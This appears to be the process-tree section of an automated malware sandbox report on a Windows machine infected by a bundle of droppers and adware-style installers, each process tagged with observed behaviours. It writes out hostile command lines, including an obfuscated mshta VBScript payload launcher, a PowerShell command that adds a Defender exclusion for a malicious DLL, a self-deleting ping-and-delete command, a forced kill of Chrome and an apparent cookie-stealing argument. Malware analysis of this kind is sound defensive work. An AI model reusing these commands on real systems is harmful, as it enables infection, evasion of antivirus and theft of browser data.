C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\vdi_compiler"9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-DQFM7.tmp\{app}\vdi_compiler.exe"10⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 411⤵
- Runs ping.exe
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HAGQN.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-HAGQN.tmp\WEATHER Manager.tmp" /SL5="$103A8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-R605H.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R605H.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-R605H.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-R605H.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629412509 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629412509 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-DDEHT.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-DDEHT.tmp\VPN.tmp" /SL5="$103C8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K66K0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-K66K0.tmp\Setup.exe" /silent /subid=7207⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SEPUG.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SEPUG.tmp\Setup.tmp" /SL5="$104BE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-K66K0.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-H2NQU.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-H2NQU.tmp\MediaBurner2.tmp" /SL5="$20354,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-V12MO.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-V12MO.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Program Files\Reference Assemblies\CYBSCJRMYN\ultramediaburner.exe"C:\Program Files\Reference Assemblies\CYBSCJRMYN\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AP96E.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-AP96E.tmp\ultramediaburner.tmp" /SL5="$40296,281924,62464,C:\Program Files\Reference Assemblies\CYBSCJRMYN\ultramediaburner.exe" /VERYSILENT9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
C:\Users\Admin\AppData\Local\Temp\6c-8734d-2e9-79a95-8ee8b2697d092\Sarybifipi.exe"C:\Users\Admin\AppData\Local\Temp\6c-8734d-2e9-79a95-8ee8b2697d092\Sarybifipi.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\2e-ec1a7-fcd-a5b9a-acd8616c1c7b2\SHaeqelovaezhi.exe"C:\Users\Admin\AppData\Local\Temp\2e-ec1a7-fcd-a5b9a-acd8616c1c7b2\SHaeqelovaezhi.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kuaozndc.mti\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\kuaozndc.mti\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kuaozndc.mti\GcleanerEU.exe /eufive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vff40gwj.vna\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\vff40gwj.vna\installer.exeC:\Users\Admin\AppData\Local\Temp\vff40gwj.vna\installer.exe /qn CAMPAIGN="654"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dn1lzy04.em3\ufgaa.exe & exit9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exeC:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exe"C:\Users\Admin\AppData\Local\Temp\ag4k3yfg.lyc\anyname.exe" -q11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\paixgppb.v2n\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\paixgppb.v2n\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\paixgppb.v2n\gcleaner.exe /mixfive10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\njukv4cu.k1t\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exe /8-2222 & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exeC:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exe /8-222210⤵
-
C:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exe"C:\Users\Admin\AppData\Local\Temp\w3zfzwbx.nhs\app.exe" /8-222211⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\4050658.exe"C:\Users\Admin\AppData\Roaming\4050658.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\5751915.exe"C:\Users\Admin\AppData\Roaming\5751915.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\7898297.exe"C:\Users\Admin\AppData\Roaming\7898297.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\8735718.exe"C:\Users\Admin\AppData\Roaming\8735718.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\4024868.exe"C:\Users\Admin\AppData\Roaming\4024868.exe"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5952 -s 14966⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\NgLOP8plJ0LLaKc5bAQ81Aq9.exe"C:\Users\Admin\Documents\NgLOP8plJ0LLaKc5bAQ81Aq9.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\3369371.exe"C:\Users\Admin\AppData\Roaming\3369371.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\4626128.exe"C:\Users\Admin\AppData\Roaming\4626128.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4765907.exe"C:\Users\Admin\AppData\Roaming\4765907.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\3710087.exe"C:\Users\Admin\AppData\Roaming\3710087.exe"7⤵
-
C:\Users\Admin\Documents\blor8zJ5PA17kKaIYWOn246T.exe"C:\Users\Admin\Documents\blor8zJ5PA17kKaIYWOn246T.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\blor8zJ5PA17kKaIYWOn246T.exe"C:\Users\Admin\Documents\blor8zJ5PA17kKaIYWOn246T.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\jeEY260TDbsX9nbKMwLGA5tW.exe"C:\Users\Admin\Documents\jeEY260TDbsX9nbKMwLGA5tW.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\zGLNEyqvsrPwyrl2xJ1GD9XS.exe"C:\Users\Admin\Documents\zGLNEyqvsrPwyrl2xJ1GD9XS.exe"6⤵
-
C:\Users\Admin\Documents\oa49cpqZl5T5Pps5fyIxAXYu.exe"C:\Users\Admin\Documents\oa49cpqZl5T5Pps5fyIxAXYu.exe"6⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\vg1a59kK32lVcmX2rJ7XCHeI.exe"C:\Users\Admin\Documents\vg1a59kK32lVcmX2rJ7XCHeI.exe"6⤵
-
C:\Users\Admin\Documents\vg1a59kK32lVcmX2rJ7XCHeI.exe"C:\Users\Admin\Documents\vg1a59kK32lVcmX2rJ7XCHeI.exe"7⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Documents\rity0deC7PDwZJhnw7Fc0mi8.exe"C:\Users\Admin\Documents\rity0deC7PDwZJhnw7Fc0mi8.exe"6⤵
-
C:\Users\Admin\Documents\dEkSjUJQJnS56H8UscLLwiNl.exe"C:\Users\Admin\Documents\dEkSjUJQJnS56H8UscLLwiNl.exe"6⤵
-
C:\Users\Admin\Documents\5UGVE6RxDwIgDLlxhN_NPoX7.exe"C:\Users\Admin\Documents\5UGVE6RxDwIgDLlxhN_NPoX7.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\29owIlFKn_c2PPR1UKwJaTQQ.exe"C:\Users\Admin\Documents\29owIlFKn_c2PPR1UKwJaTQQ.exe"6⤵
-
C:\Users\Admin\Documents\GmwMhItJIZQBqlqtfRfbgY_j.exe"C:\Users\Admin\Documents\GmwMhItJIZQBqlqtfRfbgY_j.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\GmwMhItJIZQBqlqtfRfbgY_j.exeC:\Users\Admin\Documents\GmwMhItJIZQBqlqtfRfbgY_j.exe7⤵
-
C:\Users\Admin\Documents\oMAHejMtAEYE1VopeG9aj0Fc.exe"C:\Users\Admin\Documents\oMAHejMtAEYE1VopeG9aj0Fc.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\fcIqbCfo8qwscyu0kfiY8LUW.exe"C:\Users\Admin\Documents\fcIqbCfo8qwscyu0kfiY8LUW.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\fcIqbCfo8qwscyu0kfiY8LUW.exe"C:\Users\Admin\Documents\fcIqbCfo8qwscyu0kfiY8LUW.exe"7⤵
-
C:\Users\Admin\Documents\EBPRzFXg8T9BBzxSv1xLJFze.exe"C:\Users\Admin\Documents\EBPRzFXg8T9BBzxSv1xLJFze.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe"C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\QUcb0MLCfJadB1hL2n1385G0.exe" ) do taskkill -f -iM "%~NxA"8⤵
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "QUcb0MLCfJadB1hL2n1385G0.exe"9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\lY_jtOV2TW9e7n1ZnGcMZ4jD.exe"C:\Users\Admin\Documents\lY_jtOV2TW9e7n1ZnGcMZ4jD.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\Q5ep13oDyQ6hngZglmGlIbyf.exe"C:\Users\Admin\Documents\Q5ep13oDyQ6hngZglmGlIbyf.exe"6⤵
-
C:\Users\Admin\Documents\4uwGsB6rtGnuAi8tmv_BLrne.exe"C:\Users\Admin\Documents\4uwGsB6rtGnuAi8tmv_BLrne.exe"6⤵
-
C:\Users\Admin\Documents\4uwGsB6rtGnuAi8tmv_BLrne.exe"C:\Users\Admin\Documents\4uwGsB6rtGnuAi8tmv_BLrne.exe" -q7⤵
-
C:\Users\Admin\Documents\YjGkUXS79c6Yx83LaCcitF4i.exe"C:\Users\Admin\Documents\YjGkUXS79c6Yx83LaCcitF4i.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\EsfADqyWbd6YCX_UFaZLoNFY.exe"C:\Users\Admin\Documents\EsfADqyWbd6YCX_UFaZLoNFY.exe"6⤵
-
C:\Users\Admin\Documents\7TGm2EkDGnsTEgWi5WBpVJen.exe"C:\Users\Admin\Documents\7TGm2EkDGnsTEgWi5WBpVJen.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\7TGm2EkDGnsTEgWi5WBpVJen.exeC:\Users\Admin\Documents\7TGm2EkDGnsTEgWi5WBpVJen.exe7⤵
-
C:\Users\Admin\Documents\RtOchpiStj2VNfCQPyk1aEP2.exe"C:\Users\Admin\Documents\RtOchpiStj2VNfCQPyk1aEP2.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-03C18.tmp\RtOchpiStj2VNfCQPyk1aEP2.tmp"C:\Users\Admin\AppData\Local\Temp\is-03C18.tmp\RtOchpiStj2VNfCQPyk1aEP2.tmp" /SL5="$303E2,138429,56832,C:\Users\Admin\Documents\RtOchpiStj2VNfCQPyk1aEP2.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-4TCIV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4TCIV.tmp\Setup.exe" /Verysilent8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629412509 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
-
C:\Users\Admin\Documents\lpfqOPuIJtcNciqgj3UVTK2o.exe"C:\Users\Admin\Documents\lpfqOPuIJtcNciqgj3UVTK2o.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\zMdSX4KZtAxNi0LAuHwhEANS.exe"C:\Users\Admin\Documents\zMdSX4KZtAxNi0LAuHwhEANS.exe"6⤵
-
C:\Users\Admin\Documents\3n0HF9KJeevpkrlw2ARDvFPN.exe"C:\Users\Admin\Documents\3n0HF9KJeevpkrlw2ARDvFPN.exe"6⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\3N0HF9~1.DLL,s C:\Users\Admin\DOCUME~1\3N0HF9~1.EXE7⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\3N0HF9~1.DLL,SjUVOTg18⤵
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\3N0HF9~1.DLL9⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6F4DC6C9CEC08FA7281405D11FA613DE C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F12F4648377A172ADA2B4F4B90B50024 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 55A5131627F4B6DF0E41D263EAD876BD2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8DCD8B8042E8F550EAF73ABF9C0B1673 C2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_DA55.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F8139014CDD041E94F0B3CF1E2E081572⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7CCCBFAF4E30CDDD27D6FCD8A9B977FD E Global\MSI00002⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1f5d8a52-23ee-1e46-b487-1c2ddd6e740d}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000188" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
